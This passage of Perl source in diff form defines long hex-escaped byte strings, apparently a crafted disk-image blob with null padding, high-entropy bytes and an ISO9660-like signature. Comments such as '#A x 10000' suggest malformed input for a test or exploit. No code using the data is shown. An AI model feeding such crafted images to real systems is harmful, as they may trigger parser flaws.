"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". + "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". + "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". + "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". + "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\xAA\x46\xBA\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3C\xF4\x26\x29\x3A\x1C\x03\x30\x4B\x8A\xFA\x07\x0F\xB5\x0F\x63\xBC\x07\x0F\xBC". 
+ "\xBC\x88\x0F\xB2\x45\x2B\x2D\xD3\xA2\x55\xC9\xD3\xCB\x75\x85\x85\x92\xC4\x3A\x74\x40\x25\x14\xD9\x2B\x43\x77\x96\x2B\x16\xF4\x71". + "\xC4\x80\x18\xEA\x55\xF9\xB3\xF2\xA4\x12\xCF\x6F\xCF\xA9\xCF\x62\xCF\xF3\xF4\xBF\x48\x83\xA4\x9B\x57\x72\x48\x78\x48\x6D\x48\x34". + "\x74\xE1\x0C\xB6\x01\x36\x00\x2E\x72\x4B\x2E\x8B\xEB\x31\x1F\xD0\x1F\x5E\xAD\x2F\x1F\xDA\xAD\x8A\x1F\xE1\x65\x77\x2D\xE3\xEE\x60". + "\x9B\xE6\x82\x49\xCA\xF7\xAB\xC6\x08\x7A\x73\x22\x07\x9E\x23\x5C\x4E\x64\x03\x23\xFC\x48\xF7\xB8\x0D\xF1\x43\xA6\xB6\x5A\xB7\x1E". + "\xDF\x13\xDF\x91\xDF\x6C\xDF\xE3\xE5\x8F\x78\x8D\x1C\xD3\x11\x5E\x78\x64\x78\x0B\x78\x48\x66\xB9\x80\x74\xD0\x16\x48\x0B\x50\x0A". + "\x1A\x2A\xDE\xE5\xE1\x1A\xD2\xC1\xD0\x9D\xEB\x1D\xF9\x1D\xDA\x95\xD8\xF9\xB3\xDB\xE9\xD3\xB5\xA4\xD2\xB7\xCE\xEE\xDB\x3A\xC5\x35". + "\x7B\xD5\x31\xAF\x0E\x5B\x50\x92\x92\xB7\x14\x78\x5E\x6C\xA4\xB0\x17\x18\x6F\xD9\x5D\x9C\x95\x94\x7B\x75\xDA\x97\xA1\xAD\x8D\x24". + "\xF0\xB9\x87\x44\x18\x2B\x7C\x0B\x06\xCD\xB5\x9A\x4A\x42\x4F\x16\xC3\x0B\x6F\x02\xD8\x4E\x5B\xEB\xE9\xE0\xCC\xBA\x64\x0B\x0C\x5D". + "\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x02\x18\x01\xFF\x43\x44\x30\x30\x31"; + #A x 10000 +my $img_data2 = "\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xD9\x85\xCF\x51\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\xF7\x10\xF5\xAA\x89\x78\x20\x20\xD5\xF5\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x76\x92\x4C\xF3\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF5\x08\xF4". + "\x55\xCA\x3C\x10\x10\xE4\xF4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\xAF\x17\x83\xA2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\xD5\x93\xA6\x47\xE6\x17\x95\xC3\x00\x00\x00\x00\x00\x00\x00\x00\xBA\x00\x02\xC3\x1F\x71\xC6\x4C". + "\xA7\x2D\x51\x74\x97\xE6\x00\x43\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1A\xC2\x33\x31". + "\x13\x27\x3A\xD4\x00\x00\x00\x00\x00\x00\x00\x00\x4F\x00\xD6\x16\x76\xB5\x60\xE4\xA6\x22\xA6\x34\x8F\x12\x00\xFF\xFF\xFF\xFF\xFF". + "\xFF\xFF\xFF\xFF\xFF\x00\x00\x02\x19\x01\x01\x00\x17\x00\x00\x00\x01\x00\x00\x00\x02\x00\x18\x00\x00\x00\x01\x00\x41\x31\x02\x00". + "\x19\x00\x00\x00\x01\x00\x41\x32\x02\x00\x1A\x00\x00\x00\x01\x00\x41\x33\x02\x00\x1B\x00\x00\x00\x01\x00\x41\x34"; + #A x 10000 +my $img_data3 = "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
